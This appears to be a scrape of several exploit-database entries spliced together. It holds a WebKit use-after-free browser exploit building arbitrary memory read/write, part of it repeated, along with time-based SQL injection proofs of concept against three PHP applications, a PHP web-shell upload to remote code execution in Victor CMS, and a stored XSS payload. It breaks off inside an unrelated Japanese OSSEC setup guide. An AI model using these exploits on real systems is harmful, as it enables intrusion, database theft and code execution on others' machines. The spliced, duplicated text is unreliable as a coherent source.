* Spray a couple of StringImpl obj. prior to Timer allocation
* This will force Timer allocation on same SmallPage as our Strings
*/
sprayStringImpl(0, SPRAY_STRINGIMPL);
g_frames = [];
g_round += 1;
g_input = input3;
setTimeout(confuseTargetObjRound1, 10);
} else {
setTimeout(confuseTargetObjRound2, 10);
}
}
function dumpTargetObj() {
debug_log("[+] m_timer: " + g_timer_leak);
debug_log("[+] m_messageHeading: " + g_message_heading_leak);
debug_log("[+] m_messageBody: " + g_message_body_leak);
}
function findTargetObj() {
for (let i = 0; i < g_arr_ab_1.length; i++) {
if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
debug_log("[+] Found fake ValidationMessage");
if (g_round === 2) {
g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
g_round++;
}
g_fake_validation_message = g_arr_ab_1[i];
g_arr_ab_1 = [];
return true;
}
}
return false;
}
function prepareUAF() {
g_input.setCustomValidity("ps4");
for (let i = 0; i < NB_FRAMES; i++) {
var element = document.createElement("frameset");
g_frames.push(element);
}
g_input.reportValidity();
var div = document.createElement("div");
document.body.appendChild(div);
div.appendChild(g_input);
/* First half spray */
for (let i = 0; i < NB_FRAMES / 2; i++)
g_frames[i].setAttribute("rows", g_rows1);
/* Instantiate target obj */
g_input.reportValidity();
/* ... and the second half */
for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
g_frames[i].setAttribute("rows", g_rows2);
g_input.setAttribute("onfocus", "reuseTargetObj()");
g_input.autofocus = true;
}
/* HTMLElement spray */
function sprayHTMLTextArea() {
debug_log("[+] Spraying HTMLTextareaElement ...");
let textarea_div_elem = document.createElement("div");
document.body.appendChild(textarea_div_elem);
textarea_div_elem.id = "div1";
var element = document.createElement("textarea");
/* Add a style to avoid textarea display */
element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
/*
* This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
* allocation of the node attributes and an IsoHeap allocation of the
* Element. The virtual page layout will look something like that:
* [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
*/
for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
textarea_div_elem.appendChild(element.cloneNode());
}
/* StringImpl Spray */
function sprayStringImpl(start, end) {
for (let i = start; i < end; i++) {
let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
g_obj_str[s] = 0x1337;
}
}
function go() {
/* Init spray */
sprayHTMLTextArea();
g_input = input1;
/* Shape heap layout for obj. reuse */
prepareUAF();
}
# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
# Date: 12-21-2020
# Exploit Authors: Andrea Bruschi, Raffaele Sabato
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# CVE: CVE-2020-35151
I DESCRIPTION
========================================================================
A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account.
Following the vulnerable code:
$sdata=$_POST['searchdata'];
?>
<h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>
<table id="datatable1" class="table display responsive nowrap">
<thead>
<tr>
<th class="wd-15p">S.No</th>
<th class="wd-15p">Reg Number</th>
<th class="wd-20p">Husband Name</th>
<th class="wd-10p">Date of Marriage</th>
<th class="wd-10p">Status</th>
<th class="wd-25p">Action</th>
</tr>
</thead>
<tbody>
<?php
$uid=$_SESSION['omrsuid'];
$sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
$query = $dbh -> prepare($sql);
$query->execute();
$results=$query->fetchAll(PDO::FETCH_OBJ);
II PROOF OF CONCEPT
========================================================================
## Request user
POST /omrs/user/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/user/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------197361427118054779422510078884
Content-Disposition: form-data; name="search"
-----------------------------197361427118054779422510078884--
## Request admin
POST /omrs/admin/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
Content-Length: 320
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/omrs/admin/search.php
Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
Upgrade-Insecure-Requests: 1
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="searchdata"
' and (select 1 from (select(sleep(5)))a) and 'a'='a
-----------------------------267799269040335247322746025522
Content-Disposition: form-data; name="search"
-----------------------------267799269040335247322746025522--
# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
# Date: 12-21-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 750
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
# Vulnerable Parameter : network_csv
# POC
POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
Content-Length: 1597
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_manual_defined"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_select"
300
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_text"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_units"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="taskname"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="id_recon_server"
3
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv_enabled"
on
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
Content-Type: text/plain
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network"
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="comment"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="submit"
Next
-----------------------------308827614039434535382911921119--
# Exploit Title: Victor CMS 1.0 - File Upload To RCE
# Date: 20.12.2020
# Exploit Author: Mosaaed
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Apache2/Linux
Step1: register http://localhost/CMSsite-master/register.php
step2: login as user
step3: Go to Profile
step4: upload imag as php file (upload shell.php)
step5: update user
step6: You will find your shell in img folder :/path/img/cmd.php
http://localhost/CMSsite-master/img/cmd.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
const OFFSET_ELEMENT_REFCOUNT = 0x10;
const OFFSET_JSAB_VIEW_VECTOR = 0x10;
const OFFSET_JSAB_VIEW_LENGTH = 0x18;
const OFFSET_LENGTH_STRINGIMPL = 0x04;
const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
const LENGTH_ARRAYBUFFER = 0x8;
const LENGTH_STRINGIMPL = 0x14;
const LENGTH_JSVIEW = 0x20;
const LENGTH_VALIDATION_MESSAGE = 0x30;
const LENGTH_TIMER = 0x48;
const LENGTH_HTMLTEXTAREA = 0xd8;
const SPRAY_ELEM_SIZE = 0x6000;
const SPRAY_STRINGIMPL = 0x1000;
const NB_FRAMES = 0xfa0;
const NB_REUSE = 0x8000;
var g_arr_ab_1 = [];
var g_arr_ab_2 = [];
var g_arr_ab_3 = [];
var g_frames = [];
var g_relative_read = null;
var g_relative_rw = null;
var g_ab_slave = null;
var g_ab_index = null;
var g_timer_leak = null;
var g_jsview_leak = null;
var g_jsview_butterfly = null;
var g_message_heading_leak = null;
var g_message_body_leak = null;
var g_obj_str = {};
var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
var g_round = 1;
var g_input = null;
var guess_htmltextarea_addr = new Int64("0x2031b00d8");
var master_b = new Uint32Array(2);
var slave_b = new Uint32Array(2);
var slave_addr;
var slave_buf_addr;
var master_addr;
/* Executed after deleteBubbleTree */
function setupRW() {
/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length > 0xff) {
g_relative_rw = g_arr_ab_3[i];
debug_log("[+] Succesfully got a relative R/W");
break;
}
}
if (g_relative_rw === null)
die("[!] Failed to setup a relative R/W primitive");
debug_log("[+] Setting up arbitrary R/W");
/* Retrieving the ArrayBuffer address using the relative read */
let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
let ab_index = g_jsview_leak.sub(ab_addr).low32();
if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
g_ab_index = ab_index + LENGTH_JSVIEW;
else
g_ab_index = ab_index - LENGTH_JSVIEW;
/* Overding the length of one JSArrayBufferView with a known value */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
/* Looking for the slave JSArrayBufferView */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length === 0x41) {
g_ab_slave = g_arr_ab_3[i];
g_arr_ab_3 = null;
break;
}
}
if (g_ab_slave === null)
die("[!] Didn't found the slave JSArrayBufferView");
/* Extending the JSArrayBufferView length */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
debug_log("[+] Testing arbitrary R/W");
let saved_vtable = read64(guess_htmltextarea_addr);
write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
die("[!] Failed to setup arbitrary R/W primitive");
debug_log("[+] Succesfully got arbitrary R/W!");
/* Restore the overidden vtable pointer */
write64(guess_htmltextarea_addr, saved_vtable);
/* Cleanup memory */
cleanup();
/* Set up addrof/fakeobj primitives */
g_ab_slave.leakme = 0x1337;
var bf = 0;
for(var i = 15; i >= 8; i--)
bf = 256 * bf + g_relative_rw[g_ab_index + i];
g_jsview_butterfly = new Int64(bf);
if(!read64(g_jsview_butterfly.sub(16)).equals(new Int64("0xffff000000001337")))
die("[!] Failed to setup addrof/fakeobj primitives");
debug_log("[+] Succesfully got addrof/fakeobj");
/* Getting code execution */
/* ... */
var leak_slave = addrof(slave_b);
var slave_addr = read64(leak_slave.add(0x10));
og_slave_addr = new int64(slave_addr.low32(), slave_addr.hi32());
var leak_master = addrof(master_b);
write64(leak_master.add(0x10), leak_slave.add(0x10));
var prim = {
write8: function(addr, val) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
if(val instanceof int64) {
slave_b[0] = val.low;
slave_b[1] = val.hi;
}
else {
slave_b[0] = val;
slave_b[1] = 0;
}
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
},
write4: function(addr, val) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
slave_b[0] = val;
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
},
read8: function(addr) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
var r = new int64(slave_b[0], slave_b[1]);
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
read4: function(addr) {
master_b[0] = addr.low;
master_b[1] = addr.hi;
var r = slave_b[0];
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
leakval: function(val) {
g_ab_slave.leakme = val;
master_b[0] = g_jsview_butterfly.low32() - 0x10;
master_b[1] = g_jsview_butterfly.hi32();
var r = new int64(slave_b[0], slave_b[1]);
master_b[0] = og_slave_addr.low;
master_b[1] = og_slave_addr.hi;
return r;
},
};
window.prim = prim;
setTimeout(stage2, 1000);
}
function read(addr, length) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
let arr = [];
for (let i = 0; i < length; i++)
arr.push(g_ab_slave[i]);
return arr;
}
function read64(addr) {
return new Int64(read(addr, 8));
}
function write(addr, data) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
for (let i = 0; i < data.length; i++)
g_ab_slave[i] = data[i];
}
function write64(addr, data) {
write(addr, data.bytes());
}
function addrof(obj) {
g_ab_slave.leakme = obj;
return read64(g_jsview_butterfly.sub(16));
}
function fakeobj(addr) {
write64(g_jsview_butterfly.sub(16), addr);
return g_ab_slave.leakme;
}
function cleanup() {
select1.remove();
select1 = null;
input1.remove();
input1 = null;
input2.remove();
input2 = null;
input3.remove();
input3 = null;
div1.remove();
div1 = null;
g_input = null;
g_rows1 = null;
g_rows2 = null;
g_frames = null;
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound2() {
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
setTimeout(setupRW, 6000);
}
/* Executed after deleteBubbleTree */
function leakJSC() {
debug_log("[+] Looking for the smashed StringImpl...");
var arr_str = Object.getOwnPropertyNames(g_obj_str);
/* Looking for the smashed string */
for (let i = arr_str.length - 1; i > 0; i--) {
if (arr_str[i].length > 0xff) {
debug_log("[+] StringImpl corrupted successfully");
g_relative_read = arr_str[i];
g_obj_str = null;
break;
}
}
if (g_relative_read === null)
die("[!] Failed to setup a relative read primitive");
debug_log("[+] Got a relative read");
var tmp_spray = {};
for(var i = 0; i < 100000; i++)
tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + (''+i).padStart(5, '0')] = 0x1337;
let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
/* Spraying JSView */
let tmp = [];
for (let i = 0; i < 0x10000; i++) {
/* The last allocated are more likely to be allocated after our relative read */
if (i >= 0xfc00)
g_arr_ab_3.push(new Uint8Array(ab));
else
tmp.push(new Uint8Array(ab));
}
tmp = null;
/*
* Force JSC ref on FastMalloc Heap
* https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
*/
var props = [];
for (var i = 0; i < 0x400; i++) {
props.push({ value: 0x42424242 });
props.push({ value: g_arr_ab_3[i] });
}
/*
* /!\
* This part must avoid as much as possible fastMalloc allocation
* to avoid re-using the targeted object
* /!\
*/
/* Use relative read to find our JSC obj */
/* We want a JSView that is allocated after our relative read */
while (g_jsview_leak === null) {
Object.defineProperties({}, props);
for (let i = 0; i < 0x800000; i++) {
var v = undefined;
if (g_relative_read.charCodeAt(i) === 0x42 &&
g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
g_relative_read.charCodeAt(i + 0x03) === 0x42) {
if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
g_relative_read.charCodeAt(i + 0x3f) === 0x00)
v = new Int64(str2array(g_relative_read, 8, i + 0x20));
else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
g_relative_read.charCodeAt(i + 0x13) === 0x42)
v = new Int64(str2array(g_relative_read, 8, i + 8));
}
if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
g_jsview_leak = v;
props = null;
break;
}
}
}
/*
* /!\
* Critical part ended-up here
* /!\
*/
debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
/* Run the exploit again */
prepareUAF();
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound1() {
/* Force allocation of StringImpl obj. beyond Timer address */
sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
/* Checking for leaked data */
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
dumpTargetObj();
g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
/*
* The timeout must be > 5s because deleteBubbleTree is scheduled to run in
* the next 5s
*/
setTimeout(leakJSC, 6000);
}
function handle2() {
/* focus elsewhere */
input2.focus();
}
function reuseTargetObj() {
/* Delete ValidationMessage instance */
document.body.appendChild(g_input);
/*
* Free ValidationMessage neighboors.
* SmallLine is freed -> SmallPage is cached
*/
for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
g_frames[i].setAttribute("rows", ',');
/* Get back target object */
for (let i = 0; i < NB_REUSE; i++) {
let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
let view = new Float64Array(ab);
view[0] = guess_htmltextarea_addr.asDouble(); // m_element
view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble
g_arr_ab_1.push(view);
}
if (g_round == 1) {
/*
* Spray a couple of StringImpl obj. prior to Timer allocation
* This will force Timer allocation on same SmallPage as our Strings
*/
sprayStringImpl(0, SPRAY_STRINGIMPL);
g_frames = [];
g_round += 1;
g_input = input3;
setTimeout(confuseTargetObjRound1, 10);
} else {
setTimeout(confuseTargetObjRound2, 10);
}
}
function dumpTargetObj() {
debug_log("[+] m_timer: " + g_timer_leak);
debug_log("[+] m_messageHeading: " + g_message_heading_leak);
debug_log("[+] m_messageBody: " + g_message_body_leak);
}
function findTargetObj() {
for (let i = 0; i < g_arr_ab_1.length; i++) {
if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
debug_log("[+] Found fake ValidationMessage");
if (g_round === 2) {
g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
g_round++;
}
g_fake_validation_message = g_arr_ab_1[i];
g_arr_ab_1 = [];
return true;
}
}
return false;
}
function prepareUAF() {
g_input.setCustomValidity("ps4");
for (let i = 0; i < NB_FRAMES; i++) {
var element = document.createElement("frameset");
g_frames.push(element);
}
g_input.reportValidity();
var div = document.createElement("div");
document.body.appendChild(div);
div.appendChild(g_input);
/* First half spray */
for (let i = 0; i < NB_FRAMES / 2; i++)
g_frames[i].setAttribute("rows", g_rows1);
/* Instantiate target obj */
g_input.reportValidity();
/* ... and the second half */
for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
g_frames[i].setAttribute("rows", g_rows2);
g_input.setAttribute("onfocus", "reuseTargetObj()");
g_input.autofocus = true;
}
/* HTMLElement spray */
function sprayHTMLTextArea() {
debug_log("[+] Spraying HTMLTextareaElement ...");
let textarea_div_elem = document.createElement("div");
document.body.appendChild(textarea_div_elem);
textarea_div_elem.id = "div1";
var element = document.createElement("textarea");
/* Add a style to avoid textarea display */
element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
/*
* This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
* allocation of the node attributes and an IsoHeap allocation of the
* Element. The virtual page layout will look something like that:
* [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
*/
for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
textarea_div_elem.appendChild(element.cloneNode());
}
/* StringImpl Spray */
function sprayStringImpl(start, end) {
for (let i = start; i < end; i++) {
let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
g_obj_str[s] = 0x1337;
}
}
function go() {
/* Init spray */
sprayHTMLTextArea();
g_input = input1;
/* Shape heap layout for obj. reuse */
prepareUAF();
}
# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
# Date : 2020-12-21
# Author : Musyoka Ian
# Version : CSE Bookstore 1.0
# Vendor Homepage: https://projectworlds.in/
# Platform : PHP
# Tested on : Debian
CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on
Below is results returned by SQLMap
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
POC 1
REQUEST
========
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: 192.168.196.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:09:49 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=UTF-8
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
POC 2
Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
REQUEST
=======
POST /ebook/cart.php HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
RESPONSE
=======
get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
POC 3.
Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
REQUEST
=======
GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: http://192.168.196.83/ebook/books.php
Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
RESPONSE
========
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:47:58 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 188
Connection: close
Content-Type: text/html; charset=UTF-8
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1
# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-22
# Google Dork: N/A
# Vendor Homepage: https://otsglobal.org/
# Software Link: https://codecanyon.net/item/library-management-system-22/16965307
# Affected Version: 3.0
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Kali Linux
Step 1. Login as Admin.
Step 2. Select "Book" from menu and select "Categories" from sub menu and
after that click on "Add Category".
Step 3. Insert payload - "><img src onerror=alert(1)> in "Category Name"
Step 4. Now Click on "Save" , Go to "Category" and See last , there you
will get alert box.
1。序文
OSSECは、オープンソースのホストベースの侵入検知システムであり、略してHIDと呼ぶことができます。ログ分析、ファイルの整合性チェック、ポリシー監視、ルートキット検出、リアルタイムアラーム、リンケージ応答などの機能があります。 Linux、Windows、MacOS、Solaris、HP-ux、AIXの複数のオペレーティングシステムをサポートしています。企業のセキュリティのための強力なツールです。
Zabbixと同様のS/Cランニングモード
OSSECは、3種類のロギング、アラートロギング、ファイアウォールロギング、イベント(アーカイブ)ロギングをサポートしています
サーバーはudp514(rsyslog)、udp1514(ossec-remoted)ポート監視を開き、クライアントはリアルタイムステータスデータをサーバーに送信します
Integrated fail2ban、iptablesフィルタリング、エラーログ分析
詳細な紹介とドキュメントについては、公式ウェブサイトを参照してください:http://www.ossec.net/
2。システム環境
サーバー:
コンピューター名:Ossec-Server
IPアドレス:172.16.91.130
OS: CENTOS7.0
クライアント1:
コンピューター名:Agent-Linux
IPアドレス:172.16.91.131
OS:UBUNUT14.04
クライアント2:
コンピューター名:Agent-Win7
IPアドレス:172.16.91.143
OS:WIN7X86
3。 OSSECサーバーのインストール
yumソースのインストールと構成
1。Centosの下でYumフォルダーを入力します
[root@localhost] #cd /etc/yum.repos.d/
2。WGETを使用して、レポファイルをダウンロードします
wget http://mirrors.aliyun.com/repo/centos-7.repo
WGETコマンドが有効になっていない場合、WGETツールがまだインストールされていないことを意味します。 yum -yを入力して、wgetをインストールしてインストールします。現在のディレクトリは/etc/yum.repos.d/であり、私がダウンロードしたばかりのCentos-7.repoはこのディレクトリにもあります
[root@localhost]#yum -yインストールwget
[root@localhost]#
wget http://mirrors.aliyun.com/repo/centos-7.repo
3。システムの元のレポファイルをバックアップします
[root@localhost]#mv centos-base.repocentos-base.bak.repo
#ITはCentos-base.repo-centos-base.repo.bakの名前を変更することを意味します
4.システムの元のレポファイルを交換します
MV CENTOS-7.REPOCENTOS-BASE.REPO
#ITは、Centos-7.Repo-Centos-Base.Repoの名前を変更することを意味します
[root@localhost]#mv centos-7.repo centos-base.repo 
